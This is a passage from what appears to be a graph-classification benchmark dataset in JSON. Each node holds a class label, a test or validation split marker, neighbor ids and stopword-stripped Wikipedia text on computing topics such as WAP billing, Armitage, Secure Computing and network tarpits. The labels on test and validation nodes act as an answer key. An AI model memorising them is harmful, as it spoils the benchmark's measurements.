via libraries installed part standard .net runtime microsoft also introduced windows powershell expose applications via powershell cmdlets powershell providers",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      6171,
      540,
      9245,
      3102,
      7713,
      9762,
      8227,
      8740,
      1577,
      10281,
      10282,
      2101,
      10808,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      4178,
      10839,
      8281,
      603,
      9819,
      3170,
      11371,
      622,
      9839,
      9328,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      5765,
      4231,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      4777,
      2221,
      692,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2777,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      2804,
      3834,
      1791,
      8959,
      11519,
      10506,
      3856,
      790,
      3351,
      8473,
      8985,
      11546,
      8988,
      3876,
      5413,
      5928,
      3881,
      10024,
      10026,
      1837,
      10029,
      1844,
      9525,
      11060,
      10039,
      11572,
      6972,
      7486,
      321,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      8554,
      9066,
      3960,
      9593,
      2943,
      3462,
      8582,
      9609,
      1418,
      5003,
      5004,
      6028,
      8080,
      11677,
      8607,
      1952,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      8644,
      6088,
      969,
      3535,
      8659,
      11223,
      1498,
      5594,
      478,
      479,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573,
      502
    ],
    "mask": "None"
  },
  {
    "node_id": 9809,
    "label": 4,
    "text": "WAP_billing:wap billing wap billing mechanism consumers buy content wireless application protocol wap sites charged directly mobile phone bill alternative payment mechanism debit credit cards premium sms billing using wap billing consumers buy mobile content without registering service entering username password user clicks link agrees make purchase download content wap billing particularly associated downloading mobile entertainment content like ringtones mobile games wallpapers commentators suggested could compete premium sms leading payment channel mobile content wap billing works wap-enabled mobile phones gprs 3g wireless connection customer initiates wap session content service provider browsing wap page example wap site hoster obtains visitor ’ msisdn without visitor register specific wap gateway service information provided integration operator msisdn lookup service consumers confirm purchase clicking ‘ confirm purchase ’ link mobile phone wap billing platform informs wap application completed purchase transaction consumers redirected content purchased purchases recorded billed directly via mobile phone bill using msisdn attempts made create single cross-operator wap billing platform support purchase products mobile network markets like ireland wap billing available across o2 vodafone mobile operators via msidsn forwarding wap billing available mobile aggregators operating irish market case case business model basis unlike uk market benefits cited wap billing include ability sell minors lack credit card bank account improved customer experience including ‘ single click ’ purchases transactions completed without consumers send receive text message remember shortcodes claimed wap billing also reduces possibility fraud paying mobile content another benefit cited wap billing assertion users experience ‘ browse buy ’ experience used via pc internet wap billing lacks transparency customer act signing contract handing money human reading understanding writing least typing something thus also indirectly proving legitimate customer reduced single touch even child pet occasionally touches screen may trigger purchase often customer n't notice 've actually paid something bought subscription look phone bill afterwards silently start billing single click inviting malicious apps malicious embedded ads misuse wap billing form clickjacking triggered hard stop cancel payment normally three entities involved claim money thus service indirectly paid phone bill makes complicated deny payment claim money back 2013 federal trade commission settled jesta digital llc concerning unauthorized wap billing charges",
    "neighbors": [
      4609,
      5875,
      7044,
      10141
    ],
    "mask": "Test"
  },
  {
    "node_id": 9810,
    "label": 2,
    "text": "Rebel_Code:rebel code rebel code linux open source revolution technology book glyn moody published 2001 describes evolution significance free software open source movements many interviews notable hackers review guardian stephen poole wrote open source movement might effect reducing price people willing pay products also highlighted inconsistency free cost open source price publishers asking book chris douce wrote book important addition genre writing undoubtedly become termed 'pop-computing also wrote book raised interesting questions regarding relationship technology culture lot early design decisions linux kernel determined microprocessors sean jewett wrote rebel code despite flaws must read using linux helps put perspective decisions made early sheds light revolution come",
    "neighbors": [
      6352,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 9811,
    "label": 2,
    "text": "IBM_Basic_Programming_Support:ibm basic programming support ibm basic programming support/360 bps originally called special support set standalone programs system/360 mainframes minimum 8 kib memory bps developed ibm general products division endicott new york package included assemblers iocs compilers sorts utilities governing control program bps components introduced series product announcements 1964 1965 bps came two versions — strictly card system tape based system contrary stated goals kept small supervisor permanently resident programming languages available assembler rpg fortran iv subset tape fortran required 16 kib memory also two versions bps assembler tape version enhanced capabilities bps also disk counterpart called bos also required 8 kib memory supported disks ibm 2311 group responsible bps/bos went develop dos/360 tos/360 supposed interim solution became evident os/360 would large run 16 kib systems",
    "neighbors": [
      1219,
      868,
      1386,
      10508,
      7983,
      10040,
      789,
      3960,
      3323,
      3359
    ],
    "mask": "Test"
  },
  {
    "node_id": 9812,
    "label": 2,
    "text": "List_of_Xbox_Live_games_on_Windows_10:list xbox live games windows 10 list xbox live enabled games windows 10 currently planned released windows 10 operating systems windows store application first wave windows 10 xbox games announced xbox wire march 2015 xbox live enabled games windows 10 made available windows store order released windows 10 xbox live enabled game developer needs member id xbox xbox live enabled titles identifiable marketplace green banner running across top game page icon reads xbox live",
    "neighbors": [
      4356,
      11524,
      5643,
      6797,
      782,
      1935,
      10900,
      11546,
      11549,
      7970,
      8355,
      1832,
      6827,
      3890,
      10931,
      8757,
      4289,
      9033,
      10957,
      4051,
      11221,
      342,
      11605,
      9434,
      11103,
      10338,
      740,
      617,
      8681,
      5746,
      1148,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 9813,
    "label": 2,
    "text": "Dynamic_Data_Exchange:dynamic data exchange computing dynamic data exchange dde technology interprocess communication used early versions microsoft windows os/2 dde allowed programs manipulate objects provided programs example cell embedded microsoft excel spreadsheet respond user actions affecting objects internally dde implemented terms windows message-passing architecture left vulnerable malformed third-party programs dde partially superseded object linking embedding ole currently maintained windows systems sake backwards compatibility dynamic data exchange first introduced 1987 release windows 2.0 method interprocess communication one program could communicate control another program somewhat like sun rpc remote procedure call time method communication operating system client applications windows messaging layer dde extended protocol allow peer-to-peer communication among client applications via message broadcasts dde runs via message broadcasts vulnerable window-management code pump messages problem considered design dde dde predates pre-emptive multitasking moreover code managing window handle respond dde broadcast initiator dde must distinguish expected unexpected responses dde interlocutors usually express information seek terms hierarchical string keys example cell microsoft excel known dde application name application could organize information groups known topic topic could serve individual pieces data item example user wanted pull value microsoft excel contained spreadsheet called book1.xls cell first row first column application would excel topic book1.xls item r1c1 internal changes cell due excel actions would signaled reverse calling application via additional message broadcasts common use dde custom-developed applications control off-the-shelf software example custom in-house application might use dde open microsoft excel spreadsheet fill data opening dde conversation excel sending dde commands feature mainly superseded component object model suite technologies microsoft used dde internally since release windows 95 example excel exposes extensive ole automation object model recommended method communicating excel technique however still use particularly distribution financial data dde also primary method interprocess communication internals sas programming language dde require operating system components conventional windows gui program also little-used alternative programs seeking minimize dependencies wonderware developed extension dde called netdde could used initiate maintain network connections needed dde conversations dde-aware applications running different computers network transparently exchange data dde conversation interaction client server applications netdde could used along dde dde management library ddeml applications codice_1 netdde library files microsoft licensed basic netbios frames protocol version product inclusion various versions windows windows workgroups windows xp addition wonderware also sold enhanced version netdde customers included support tcp/ip technology extensively used scada field basic windows applications using netdde clipbook viewer winchat microsoft hearts netdde still included windows server 2003 windows xp service pack 2 although disabled default removed entirely windows vista however prevent existing versions netdde installed functioning later versions windows",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      603,
      2145,
      8301,
      1656,
      5754,
      9340,
      639,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      1676,
      653,
      6797,
      3224,
      4771,
      7846,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      5401,
      5913,
      8473,
      284,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      9525,
      1856,
      5952,
      10561,
      1348,
      844,
      5471,
      10079,
      11616,
      6500,
      9066,
      2943,
      9609,
      9612,
      9114,
      10654,
      8607,
      11683,
      10673,
      6584,
      11196,
      2493,
      7629,
      5594,
      8161,
      6114,
      4074,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9814,
    "label": 2,
    "text": "SDSF:sdsf system display search facility sdsf component ibm mainframe operating system z/os interactive user interface allows users administrators view control various aspects mainframe operation system resources information displayed sdsf includes batch job output unix processes scheduling environments status external devices printers network lines sdsf primarily used access batch system log files dumps field-developed program offering sdsf known spool display search facility word spool changed system became program product late 1980s z/os release 9 sdsf supports rexx interface allowing batch programs use sdsf facilities support includes stem variables containing sdsf-originated information prior z/os release 10 sdsf supported use jes2 jes3 although isv products phoenix software international tone software available similar functionality jes3 beyond z/os release 10 sdsf fully supports jes3 including new commands jds ods display data/sets job output jes3 jobs release z/os v1r13 sdsf came packed interesting features like cursor sensitive sort point shoot sort extensive support oper logs rexx java programmed environments sdsf organized collection panels panel displays information specific aspect mainframe operations panels currently provided st panel sdsf supports following commands batch job commands translated jes2 jes3 command performs desired function",
    "neighbors": [
      3916,
      7053,
      7983,
      5492,
      6678,
      4535,
      2168
    ],
    "mask": "Test"
  },
  {
    "node_id": 9815,
    "label": 4,
    "text": "Armitage_(computing):armitage computing armitage graphical cyber attack management tool metasploit project visualizes targets recommends exploits free open source network security tool notable contributions red team collaboration allowing shared sessions data communication single metasploit instance armitage written supported raphael mudge armitage gui front-end metasploit framework developed raphael mudge goal helping security professionals better understand hacking help realize power metasploit originally made cyber defense exercises since expanded user base penetration testers armitage scriptable red team collaboration tool built top metasploit framework armitage user may launch scans exploits get exploit recommendations use advanced features metasploit framework meterpreter",
    "neighbors": [
      9320,
      939,
      5612,
      5677,
      7983,
      1429,
      7228,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 9816,
    "label": 9,
    "text": "Metamath:metamath metamath formal language associated computer program proof checker archiving verifying studying mathematical proofs several databases proved theorems developed using metamath covering standard results logic set theory number theory algebra topology analysis among others july 2019 set proved theorems using metamath one largest bodies formalized mathematics containing particular proofs 71 100 theorems formalizing 100 theorems challenge making third hol light isabelle coq mizar proofpower lean nqthm acl2 nuprl least 17 proof verifiers databases use metamath format metamath language metalanguage suitable developing wide variety formal systems metamath language specific logic embedded instead simply regarded way prove inference rules asserted axioms proven later applied largest database proved theorems follows conventional zfc set theory classic logic databases exist others created metamath language design focused simplicity language employed state definitions axioms inference rules theorems composed handful keywords proofs checked using one simple algorithm based substitution variables optional provisos variables must remain distinct substitution made set symbols used constructing formulas declared using codice_1 codice_2 variable symbols statements example grammar formulas specified using combination codice_3 floating variable-type hypotheses codice_4 axiomatic assertion statements example axioms rules inference specified codice_4 statements along codice_6 codice_7 block scoping optional codice_8 essential hypotheses statements example using one construct codice_4 statements capture syntactic rules axiom schemas rules inference intended provide level flexibility similar higher order logical frameworks without dependency complex type system theorems derived rules inference written codice_10 statements example note inclusion proof codice_10 statement abbreviates following detailed proof essential form proof elides syntactic details leaving conventional presentation metamath proof steps use single substitution rule simple replacement variable expression proper substitution described works predicate calculus proper substitution metamath databases support derived construct instead one built metamath language substitution rule makes assumption logic system use requires substitutions variables correctly done detailed example algorithm works steps 1 2 theorem codice_12 metamath proof explorer set.mm depicted left let explain metamath uses substitution algorithm check step 2 logical consequence step 1 use theorem codice_13 step 2 states conclusion theorem codice_13 theorem codice_13 states theorem would never appear cryptic form textbook literate formulation banal two quantities equal one replace one operation check proof metamath attempts unify one way unifying metamath uses premise codice_13 premise states consequence previous computation metamath knows substituted premise becomes thus step 1 therefore generated turn step 1 unified codice_17 codice_17 definition number codice_19 states codice_20 unification simply matter constants straightforward problem variables substitute verification finished two steps proof codice_12 correct metamath unifies check syntactical rules respected fact type codice_22 thus metamath check also typed codice_22 metamath program original program created manipulate databases written using metamath language text command line interface written c. read metamath database memory verify proofs database modify database particular adding proofs write back storage prove command enables users enter proof along mechanisms search existing proofs metamath program convert statements html tex notation example output modus ponens axiom set.mm many programs process metamath databases particular least 17 proof verifiers databases use metamath format metamath website hosts several databases store theorems derived various axiomatic systems databases .mm files associated interface called explorer allows one navigate statements proofs interactively website user-friendly way databases use hilbert system formal deduction though requirement metamath proof explorer recorded set.mm main far largest database 23,000 proofs main part july 2019 based classical first-order logic zfc set theory addition tarski-grothendieck set theory needed example category theory database maintained twenty years first proofs set.mm dated august 1993 mainly work norman megill also proofs made contributors database contains developments among fields set theory ordinals cardinals recursion equivalents axiom choice continuum hypothesis ... construction real complex number systems order theory graph theory abstract algebra linear algebra general topology real complex analysis hilbert spaces number theory elementary geometry metamath proof explorer references many text books used conjunction metamath thus people interested studying mathematics use metamath connection books verify proved assertions match literature database develops mathematics constructive point view starting axioms intuitionistic logic continuing axioms constructive set theory database develops mathematics quine new foundations set theory database starts higher-order logic derives equivalents axioms first-order logic zfc set theory metamath website hosts databases associated explorers nonetheless noteworthy database peano.mm written robert solovay formalizes peano arithmetic database nat.mm formalizes natural deduction database miu.mm formalizes mu puzzle based formal system miu presented gödel escher bach metamath website also hosts older databases maintained anymore hilbert space explorer presents theorems pertaining hilbert space theory merged metamath proof explorer quantum logic explorer develops quantum logic starting theory orthomodular lattices metamath generic concept proof namely tree formulas connected inference rules specific logic embedded software metamath used species logic different hilbert-style logics sequents-based logics even lambda calculus however metamath provides direct support natural deduction systems noted earlier database nat.mm formalizes natural deduction metamath proof explorer database set.mm instead use set conventions allow use natural deduction approaches within hilbert-style logic using design ideas implemented metamath raph levien implemented small proof checker mmverify.py 500 lines python code ghilbert similar though elaborate language based mmverify.py levien would like implement system several people could collaborate work emphasizing modularity connection small theories using levien seminal works many implementations metamath design principles implemented broad variety languages juha arpiainen implemented proof checker common lisp called bourbaki marnix klooster coded proof checker haskell called hmm although use overall metamath approach formal system checker coding also implement new concepts mel o'cat designed system called mmj2 provides graphic user interface proof entry initial aim mel o'cat allow user enter proofs simply typing formulas letting mmj2 find appropriate inference rules connect metamath contrary may enter theorems names may enter formulas directly mmj2 also possibility enter proof forward backward metamath allows enter proof backward moreover mmj2 real grammar parser unlike metamath technical difference brings comfort user particular metamath sometimes hesitates several formulas analyzes meaningless asks user choose mmj2 limitation longer exists also project william hale add graphical user interface metamath called mmide paul chapman turn working new proof browser highlighting allows see referenced theorem substitution made",
    "neighbors": [
      3876,
      4612,
      4791,
      11083,
      6797,
      2062,
      7983,
      7185,
      11026,
      10460,
      823,
      8924,
      4446,
      735
    ],
    "mask": "None"
  },
  {
    "node_id": 9817,
    "label": 4,
    "text": "Secure_Computing_Corporation:secure computing corporation secure computing corporation scc public company developed sold computer security appliances hosted services protect users data mcafee acquired company 2008 company also developed filtering systems used governments iran saudi arabia blocks citizens accessing information internet 1984 research group called secure computing technology center sctc formed honeywell minneapolis minnesota centerpiece sctc work security-evaluated operating systems nsa work included secure ada target sat logical coprocessing kernel lock designed meet stringent a1 level trusted computer systems evaluation criteria tcsec next several years secure computing morphed small defense contractor commercial product vendor largely investment community much less interested purchasing security goods defense contractors commercial product vendors especially vendors growing internet space secure computing became publicly traded company 1995 following pattern internet-related startups stock price tripled first day opened 16 share closed 48 price peaked around 64 next several weeks collapsed following year ranged roughly 3 20 afterward company purchased mcafee company headquarters moved san jose california 1998 though bulk workforce remained twin cities roseville employees completed move st. paul minnesota february 2006 several sites exist largely result mergers secure computing consisted several merged units one oldest enigma logic inc. started around 1982 bob bosen founder claims created first security token provide challenge-response authentication bosen published computer game trs-80 home computer 1979 called 80 space raiders used simple challenge response mechanism copy protection people used mechanism encouraged repackage remote authentication bosen started enigma logic filed patents 1982–83 patent issued united kingdom 1986 ultimately challenge portion challenge response eliminated produce one-time password token similar securid product enigma logic merged secure computing corporation 1996 secure computing acquired smartfilter product line purchasing webster network strategies producer webtrack product 1996 acquisition included domain name webster.com eventually sold publishers webster dictionary shortly acquiring webster/smartfilter product secure computing merged border network technologies canadian company selling borderware firewall border network technologies boasted excellent product highly developed set sales channels said sales channels major inducement merger although plan completely merge borderware product sidewinder offer single product existing users products never quite succeeded 1998 borderware business unit sold new company borderware technologies inc. formed one original borderware founders time mergers yielded highly distributed company offices minnesota florida california two three ontario proved unwieldy company scaled back offices minnesota california 2002 company took gauntlet firewall product network associates 2003 secure computing acquired n2h2 makers bess web filtering package consolidation bess smartfilter bess referred smartfilter bess edition company literature acquisition cyberguard announced august 2005 approved january 2006 year earlier cyberguard attempted acquire secure computing proposal rejected largest merger secure computing time resulted addition several product lines including three classes firewalls content protocol filtering systems enterprise-wide management system controlling products several offices also added including cyberguard main facility deerfield beach florida well webwasher development office paderborn germany snapgear development office brisbane australia 2006 company merged atlanta-based ciphertrust developer email security solutions merger announced july 2006 completed august 2006 july 30 2008 secure computing announced intention sell safeword authentication product line aladdin knowledge systems leaving company business focused web/mail security firewalls sale concluded later year september 22 2008 mcafee announced intention acquire secure computing acquisition completed long afterwards combined company formed world largest dedicated security company time trustedsource reputation system secure computing obtained part ciphertrust acquisition key technology company enabling product lines global intelligence capability based behavioral analysis traffic patterns company email web firewall devices hosted services well numerous oem partners trustedsource derived real-time reputation scores ips urls domains mail/web content based variety data mining/analysis techniques support vector machine random forest term-frequency inverse-document frequency tfidf classifiers company flagship web security product line secure web appliance formerly known webwasher provided anti-malware protection trustedsource reputation-enabled url filtering controls content caching ssl scanning capabilities june 2008 secure computing launched secure web protection service in-the-cloud hosted web security service provided similar set features secure web appliance without requiring on-premises equipment software company flagship email security product line secure mail appliance formerly known ironmail provided trustedsource reputation-enabled anti-spam data-leakage protection dlp encryption anti-malware capabilities company flagship firewall product formerly known sidewinder renamed mcafee firewall enterprise mcafee sold sidewinder forcepoint january 2016 years secure computing antecedent organizations offered following major lines firewall products sidewinder firewall incorporated technical features high-assurance lock system including type enforcement technology later applied selinux however interaction secure computing open source community spotty due company ownership patents related type enforcement sidewinder never really tried achieve a1 tcsec rating earn eal-4+ common criteria rating along sidewinder gauntlet one earliest application layer firewalls developed large customer base united states department defense gauntlet originally developed trusted information systems tis commercial version tis firewall toolkit early open source firewall package developed darpa contract opennet initiative studied filtering software used governments block access citizens found secure computing smartfilter program heavily used iranian saudi governments according secure computing use software iran without consent—u.s sanctions prohibit american companies dealings iran—and 2005 company said actively working stop illegal use response company jonathan zittrain co-director harvard law school berkman center internet society stated fact remains software use extended period time 've seen secure computing software turn iran 've seen saudi arabia well 2001 new york times reported secure computing one ten companies competing saudi government contract software block citizens access websites deemed offensive company already deal saudis due expire 2003 defense secure computing always stated control customers use product sold according opennet initiative 2007 report saudi government censorship extensively covers religious social content though sites relating opposition groups regional political human rights issues also targeted governments united arab emirates oman sudan tunisia also actively use smartfilter tunisian government goes far redirect blocked pages fake error 404 page hide fact blocking software used tunisian government generally recognized poor record comes right free expression",
    "neighbors": [
      5506,
      3467,
      8976,
      10772,
      4760,
      3487,
      11175,
      3885,
      10801,
      823,
      704,
      3520,
      8904,
      8661,
      1634,
      4067,
      5860,
      998,
      8172,
      3825,
      125,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9818,
    "label": 7,
    "text": "Cvent:cvent cvent inc. privately held software-as-a-service saas company specializes market-leading meetings events hospitality management technology company offers web-based software meeting site selection online event registration event management email marketing web surveys company owned private equity firm vista equity partners cvent founded september 1999 reggie aggarwal year received 17 million venture capital grew staff 125 employees following dot-com bubble burst september 11 attacks cvent faced near-bankruptcy forced cut 80 staff company became profitable 2003 2011 cvent growing 50 year received 136 million funding new enterprise associates july 2011 time largest investment u.s. software company since 2007 june 13 2012 cvent announced acquisition austin-based startup crowdtorch previously known seed labs 4.2 million seven days later announced acquisition portland-based application developer crowdcompass 10 million cvent filed s-1 u.s. securities exchange commission july 8 2013 proposing initial public offering 5.6 million shares went public new york stock exchange august 9 2013 initial price 21 company raised 117.6 million received market capitalization billion dollars ipo referenced regards use jobs act enabled company quickly offer ipo 2016 company acquired venture capital company vista equity partners usd 1.65 billion ashok trivedi co-founder mastech digital igate early investor company june 5 2018 cvent announced acquired kapow online booking platform venues experiences june 10 2019 cvent announced acquired mobile event technology provider doubledutch july 2000 cvent introduced first saas product web-based tool event planners manage invitations collect registration fees 2006 introduced product conducting online surveys followed introduction cvent supplier network two years later supplier network free online marketing place connects meeting planners venues services 2009 company began offering professional services app development tool crowdtorch launched 2009 cvent also produces destination guide free online 8,000-page travel guide designed meeting planners information 800 different destinations strategic meetings management helps users manage budgets",
    "neighbors": [
      3220
    ],
    "mask": "Test"
  },
  {
    "node_id": 9819,
    "label": 6,
    "text": "Special_folder:special folder microsoft windows special folder folder presented user interface abstract concept instead absolute folder path synonymous term shell folder sometimes used instead special folders make possible application ask operating system appropriate location certain kinds files found independently version user language windows used windows server 2003 earlier folder like start menu different name non-english versions windows example german versions windows xp startmenü however starting windows vista versions windows use english named folders display different names windows explorer windows 10 user switch another display language names special folders change windows uses concept special folders present contents storage devices connected computer fairly consistent way frees user deal absolute file paths often change operating system versions even individual installations idea evolved time new special folders added every version windows post introduction windows 95 microsoft compatible windows software logo requires application make use special folders locations locate appropriate folders documents application settings stored special folder either reference physical file system directory reference virtual folder former case analogous environment variables — fact many environment variables set user session defined special folders set point virtual folders actually exist file system instead presented windows explorer tree folders user navigate known shell namespace windows xp systems root namespace desktop virtual folder contains documents computer network places network neighborhood windows 95 98 recycle bin virtual folders virtual folders like desktop accompanying special folder reference directory physical file system windows explorer displays combined contents virtual folder associated file system folder user seen figure 1 shows folder view windows xp explorer desktop virtual folder four standard virtual folders seen well additional folder folder desktop real folder located desktop directory user profile third-party programs add virtual folders windows explorer following tables list file system virtual folders available windows vista os version special folder introduced given well items like userprofile windir windows environment variables notes notes",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      601,
      603,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      7847,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      740,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      3496,
      430,
      6062,
      10673,
      1970,
      9655,
      6584,
      1978,
      960,
      3522,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      9694,
      6114,
      6115,
      4074,
      6637,
      9709,
      6641,
      11251,
      3573,
      10751
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9820,
    "label": 2,
    "text": "BLIS/COBOL:blis/cobol blis/cobol discontinued operating system unusually written cobol system gain reasonably wide acceptance optimised compile business applications written cobol blis available range data general nova data general eclipse 16-bit minicomputers marketed information processing inc. ipi regularly exhibited product national computer conference 1970s 80s priced us 830 10,000 depending number supported users features 1977 ipi boasted 100 operational installations system worldwide 1985 version ibm pc existed called pc-blis originally operating systems written assembly language particular processor family processors non-assembler operating systems comparatively slow easier revision repair one reasons c programming language low-level features resemble assembly language ways early intent use writing operating systems similar goals led ibm development pl/s high-level nature cobol created problems operating system development partially addressed blis since deliberately optimized cobol",
    "neighbors": [
      477,
      1952,
      2179,
      8262,
      6503,
      7983,
      1776,
      3323,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9821,
    "label": 3,
    "text": "SISNE_plus:sisne plus sisne plus ms-dos clone created itautec scopus tecnologia brazil prior end market reserve 1991 time forbid importation electronic equipment software general use widespread use ms-dos importations allowed sisne plus os discontinued",
    "neighbors": [
      9166
    ],
    "mask": "None"
  },
  {
    "node_id": 9822,
    "label": 3,
    "text": "Terrorpods:terrorpods terrorpods 1987 shooting game simple business simulation psygnosis originally developed amiga atari st later ported commodore 64 zx spectrum amstrad cpc msx casts player industrial spy science fiction future assigned halt evil empire production fearsome war machines called terrorpods win game player must manage colonies specialised industries produce terrorpod fighting enemy forces like traditional shooting game appearance terrorpods conceived rejected design psygnosis cover artist roger dean martian fighters jeff wayne musical version war worlds player views action terrorpods cockpit dsv defence strategy vehicle consumes fuel travels around game world world ten colonies player must defend trade minerals enemy forces comprise destructible terrorpods spoilers roaming world indestructible mothership hovers overhead periodically shoots player player prime objective set resource trading ten colonies building mineral resources build one-tenth terrorpod five minerals fuel detonite quanza zenite aluma former four used fuel weapons latter required build terrorpod parts colonies tend specialise exportation single mineral player buy cheap profit player must sell cheaply bought resources another colony contact colony trading player must dispatch trading drover vehicle drive dsv drover useful unlike dsv consume fuel travelling spoilers steal minerals colonies shot phaser cannon consumes little fuel terrorpods attack colonies repelled destroyed phaser destroy terrorpods player must use missiles require precious detonite work player taken aim terrorpod lines making crosshair shift around seconds player must realign successful hit colony destroyed terrorpod player repair mineral-consuming energy beam game ends player gathered parts build terrorpod terrorpods originally released amiga atari st included inside game box foldout poster drawn tim white depicting three terrorpods excavating minerals icy surface colian game later released commodore 64 zx spectrum amstrad cpc msx versions removed resource management aspects original turning game straight-up shooter terrorpods earned positive reviews atari st user called superb praising high fidelity graphics sound tense strategic gameplay terrorpods review lazy game reviews",
    "neighbors": [
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 9823,
    "label": 8,
    "text": "Web_information_system:web information system web-based information displays many benefits multimedia technology using today fast broadband connection possible stream sophisticated content computer anywhere world advantage many people information received read wherever whenever convenient crucial factor busy executive significant amount interactive multimedia content delivered via internet web information system web-based information system information system uses internet web technologies deliver information services users information systems/applications software system whose main purpose publish maintain data using hypertext-based principles web information system usually consists one web applications specific functionality-oriented components together information components non-web components web browser typically used front-end whereas database back-end",
    "neighbors": [
      2901,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 9824,
    "label": 4,
    "text": "Tarpit_(networking):tarpit networking tarpit also known teergrube german word tarpit service computer system usually server purposely delays incoming connections technique developed defense computer worm idea network abuses spamming broad scanning less effective therefore less attractive take long concept analogous tar pit animals get bogged slowly sink surface like swamp tom liston developed original tarpitting program labrea protect entire network tarpit run single machine machine listens address resolution protocol requests go unanswered indicating unused addresses replies requests receives initial syn packet scanner sends syn/ack response open socket prepare connection fact forget connection sending syn/ack however remote site sends ack gets ignored believes 3-way-handshake complete starts send data never reaches destination connection time since system believes dealing live established connection conservative timing instead try retransmit back-off retransmit etc quite later versions labrea also added functionality reply incoming data using raw ip packets sockets resources tarpit server bogus packets request sending site slow keep connection established waste even time scanner one possible avenues considered battle bulk-spam one time mandate small fee every submitted mail introducing artificial cost negligible impact legitimate use long fee small enough automated mass-scale spam would instantly become unattractive tarpitting could seen similar technically much less complex approach cost spammer would measured terms time efficiency rather money authentication procedures increase response times users attempt invalid passwords smtp authentication exception however server-to-server smtp transfers spam injected require authentication various methods discussed implemented smtp tarpits systems plug mail transfer agent mta i.e mail server software sit front proxy one method increases transfer time mails seconds delaying initial greeting message greet delay idea matter legitimate mail takes little longer deliver due high volume make difference spammers downside mailing lists legitimate mass-mailings explicitly whitelisted suffer email systems sendmail 8.13+ implement stronger form greet delay form pauses connection first established listens traffic detects traffic prior greeting violation rfc 2821 closes connection since many spammers write smtp implementations specification reduce number incoming spam messages another method delay known spammers e.g using blacklist see spamming dnsbl openbsd integrated method core system since openbsd 3.3 special-purpose daemon spamd functionality firewall pf redirect known spammers tarpit ms exchange tarpit senders send invalid address exchange smtp connector connected authentication system subtle idea greylisting simple terms rejects first connection attempt previously-unseen ip address assumption spammers make one connection attempt attempts short period time send message whereas legitimate mail delivery systems keep retrying longer period retry eventually allowed without impediments finally elaborate method tries glue tarpits filtering software together filtering e-mail realtime transmitted adding delays communication response filter spam likeliness indicator example spam filter would make guess line every x bytes received likely message going spam likely mta delay transmission smtp consists requests mostly four-letter words mail replies minimally three-digit numbers last line reply number followed space preceding lines followed hyphen thus determining message attempted send spam mail server reply tarpit waits fifteen seconds lines long delays allowed smtp humans sometimes send mail manually test mail servers ties smtp sending process spammer computer limit amount spam send linux kernel patched allow tarpitting incoming connections instead usual dropping packets implemented iptables addition tarpit target packet inspection matching features applied tarpit targets applied targets server determine given mail message spam e.g addressed spam trap trusted users reports server may decide ip address responsible submitting message deserves tarpitting cross-checking available dnsbls help avoid including innocent forwarders tarpit database daemon exploiting linux libipq check remote address incoming smtp connections database spamcannibal gpl software designed around idea stockade similar project implemented using freebsd ipfirewall one advantage tarpitting ip level regular tcp connections handled mta stateful although mta n't use much cpu sleeps still uses amount memory required hold state connection opposite labrea-style tarpitting stateless thus gaining advantage reduced cost spammer box however noted making use botnets spammers externalize computer-resource costs known tarpitted connection may generate significant amount traffic towards receiver sender considers connection established tries send retransmit actual data practice given current average computer botnet size reasonable solution drop suspicious traffic completely without tarpitting way tcp syn segments retransmitted whole http https requests well ms exchange two successful commercial implementations tar pit idea first developed turntide philadelphia-based startup company acquired symantec 2004 28 million cash turntide anti spam router contains modified linux kernel allows play various tricks tcp traffic varying tcp window size grouping various email senders different traffic classes limiting bandwidth class amount abusive traffic reduced particularly abusive traffic coming single sources easily identified high traffic volume symantec acquisition canadian startup company called mailchannels released traffic control software uses slightly different approach achieve similar results traffic control semi-realtime smtp proxy unlike turntide appliance applies traffic shaping network layer traffic control applies traffic shaping individual senders application layer approach results somewhat effective handling spam traffic originating botnets allows software slow traffic individual spam zombies rather requiring zombie traffic aggregated class",
